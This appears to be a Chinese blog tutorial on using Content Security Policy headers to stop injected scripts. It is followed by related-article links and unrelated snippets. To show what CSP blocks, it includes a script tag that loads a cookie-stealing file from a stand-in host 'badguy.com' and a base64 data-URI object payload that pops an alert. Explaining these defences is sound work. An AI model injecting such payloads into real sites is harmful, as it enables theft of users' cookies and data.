首先,什么是最后一道防线?
网页入侵都有一个过程,简单来说,就是1.代码注入,2.代码执行。

对于黑客来说,代码注入后并不代表就万事大吉了,因为此时代码只是安静地躺在受害者的服务器里,什么坏事都没干呢!

所以必须要有代码执行这一步。
今天要讲的,就是如何阻止恶意代码的执行。

恶意代码的执行方式1:inline script

比如我的某个网站 example.com 被注入了恶意代码了,这段代码长这样:

<script src="badguy.com/steal-your-cookies.js"></script>

这段代码会从一个叫 badguy.com 的网站加载一个 js 脚本文件并执行。只要这段代码被执行了,用户的一些信息就会被窃取。

恶意代码的执行方式2:Data URI scheme

Data URI scheme 设计的初衷是为了把一些小的资源,比如图片,直接嵌入到 HTML 中,避免了额外的加载。
比如,传统的图片代码是这样的:

<img src="example.com/1.jpg" />

这种加载会额外消耗网络带宽,并增加网页的响应时间
现在可以这样做:

<img src="data:image/gif;base64,编码数据" />

这样的话,只要加载一次,就可以显示图片了。
不过,这种方式可以被利用来执行JS代码!
比如,黑客只要注入下面这段看起来人畜无害的代码,用户一打开网页,就会……boom!(好吧,其实就是弹出个对话框,调戏下用户)

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgibmkgc2hpIFNCIG1hPyIpPC9zY3JpcHQ+"></object>

当然恶意代码执行的方式多种多样,这里就不一一列举了,大家有个概念即可。

防止代码执行的内容安全策略:CSP

CSP是 Content-Security-Policy 缩写,基本作用是建立一套白名单,所有在白名单之外的代码都不允许执行。

CSP 应用一:拒绝执行第三方域名的脚本

Content-Security-Policy: script-src 'self'

如此一来,例1中的 steal-your-cookies.js 脚本便不会被加载,更不会被执行了。

CSP 应用二:拒绝执行 Data URI Scheme

Content-Security-Policy: object-src 'none'

如此一来,例2中的 base64 编码后的代码就无法被执行了。
但是,除了 object 标签外,img 标签也是可以执行 base64 代码的,除了 img,还有 media, frame 等……

CSP 应用三:向管理员主动报告入侵情况

Content-Security-Policy: report-uri http://example.com/report.php

在 CSP 策略中加入 report-uri 指令,即可向特定网址发送当前网页里任何违反 CSP 策略的情况。如此一来,管理员便可以知道自己的网站是否被入侵了。

接下来是广告时间:
我的简书:http://www.jianshu.com/u/0708...
我的知乎:https://www.zhihu.com/people/...
我的公众号:OutOfRange

有事欢迎骚扰 ~

网页入侵最后一道防线:CSP内容安全策略的更多相关文章

  1. 【XSS】再谈CSP内容安全策略

    再谈CSP内容安全策略 之前每次都是想的很浅,或者只是个理论派,事实证明就是得动手实践 参考 CSP的用法 官方文档 通过设置属性来告诉浏览器允许加载的资源数据来源.可通过Response响应头来设置 ...

  2. aspnet core2中使用csp内容安全策略

    aspnet core2中使用csp内容安全策略 问题:aspnet core2如何使用csp防止xss的攻击 方法: public void ConfigureServices( IServiceC ...

  3. Content Security Policy (CSP)内容安全策略

    CSP简介 Content Security Policy(CSP),内容(网页)安全策略,为了缓解潜在的跨站脚本问题(XSS攻击),浏览器的扩展程序系统引入了内容安全策略(CSP)这个概念. CSP ...

  4. CSP内容安全策略总结及如何抵御 XSS 攻击

    跨域脚本攻击 XSS 是最常见.危害最大的网页安全漏洞.为了防止它们,要采取很多编程措施,非常麻烦.很多人提出,能不能根本上解决问题,浏览器自动禁止外部注入恶意脚本?这就是"网页安全政策&q ...

  5. CSP内容安全策略

    在浏览网页的过程中,尤其是移动端的网页,经常看到有很多无关的广告,其实大部分广告都是所在的网络劫持了网站响应的内容,并在其中植入了广告代码.为了防止这种情况发生,我们可以使用CSP来快速的阻止这种广告 ...

  6. Content Security Policy (CSP)内容安全策略总结

    跨域脚本攻击 XSS 是最常见.危害最大的网页安全漏洞. 为了防止它们,要采取很多编程措施,非常麻烦.很多人提出,能不能根本上解决问题,浏览器自动禁止外部注入恶意脚本?这就是"网页安全政策& ...

  7. 安全 - 内容安全策略(CSP)(未完)

    威胁 跨站脚本攻击(Cross-site scripting) 跨站脚本攻击Cross-site scripting (XSS)是一种安全漏洞,攻击者可以利用这种漏洞在网站上注入恶意的客户端代码. 攻 ...

  8. 内容安全策略(CSP)详解

    1.背景 1.1.同源策略 网站的安全模式源于"同源策略",web浏览器允许第一个web页面中的脚本访问页面中的数据,但前提是两个web页面具有相同的源.此策略防止一个页面的恶意脚 ...

  9. 内容安全策略(CSP)

    内容安全策略(CSP),其核心思想十分简单:网站通过发送一个 CSP 头部,来告诉浏览器什么是被授权执行的与什么是需要被禁止的.其被誉为专门为解决XSS攻击而生的神器. 1.CSP是什么 CSP指的是 ...

随机推荐

  1. shell_常规小脚本

    shell 1.检查Mysql的健康状态 #!/bin/bashpgrep -x mysqld &> /dev/nullif [ $? -ne 0 ]thenecho “At time: ...

  2. SpringMVC配置讲解(一)

    SpringMVC 核心类和接口 DispatcherServlet   -- 前置控制器 在DispatcherServlet的初始化过程中,框架会在web应用的 WEB-INF文件夹下寻找名为[s ...

  3. python_3_字符串

    1.strip,lstrip,rstrip " hi, ming ".strip() #去掉前后空格 "@hi,ming@".strip("@&quo ...

  4. 吴裕雄--天生自然python学习笔记:python 用pygame模块开发俄罗斯方块游戏

    俄罗斯方块游戏 多年前,游戏机中最流行的游戏就是“俄罗斯方块”了.时至今日,虽然网络 游戏日新月异 ,但“俄罗斯方块”这款小游戏仍在许多人心中 占有一席之地.本例中, 我们将亲手设计一个简单的俄罗斯方 ...

  5. O - Snacks(DFS序)

    百度科技园内有nn个零食机,零食机之间通过n−1n−1条路相互连通.每个零食机都有一个值vv,表示为小度熊提供零食的价值. 由于零食被频繁的消耗和补充,零食机的价值vv会时常发生变化.小度熊只能从编号 ...

  6. day26-socket(server和client通信)

    # socket是应用层与TCP/IP协议通信的中间软件抽象层,它是一组接口.它把复杂的TCP/IP协议隐藏到socket #接口的后面,让socket去组织数据,以符合指定的协议. # socket ...

  7. 吴裕雄--天生自然python学习笔记:python爬虫PM2.5 实时监测显示器

    PM2.5 对人体的健康影响很大,所以空气中的 PM2.5 实时信息受到越来越多的关注. Python 的 Pandas 套件不但可以自动读取网页中的表格 数据 , 还可对数据进行修改.排序等处理,也 ...

  8. CMOS

    CMOS是Complementary Metal Oxide Semiconductor(互补金属氧化物半导体)的缩写.它是指制造大规模集成电路芯片用的一种技术或用这种技术制造出来的芯片,是电脑主板上 ...

  9. HihoCode-1053-居民迁移

    解法: 一开始不会做,看到标签说是贪心加二分忽然就会了,二分是分的是人口最多居住点的人口,检查人口最多的居住点人口为mid是否可行.贪心是如果从左往右循环就尽量把人口往左迁移,如果从右往左循环就尽量把 ...

  10. Java反射的应用 --- 内省

    一.基础概念 内省(Introspector) 是Java 语言对 JavaBean 类属性.事件的一种缺省处理方法.Java JDK中提供了一套 API 用来访问某个属性的 getter/sette ...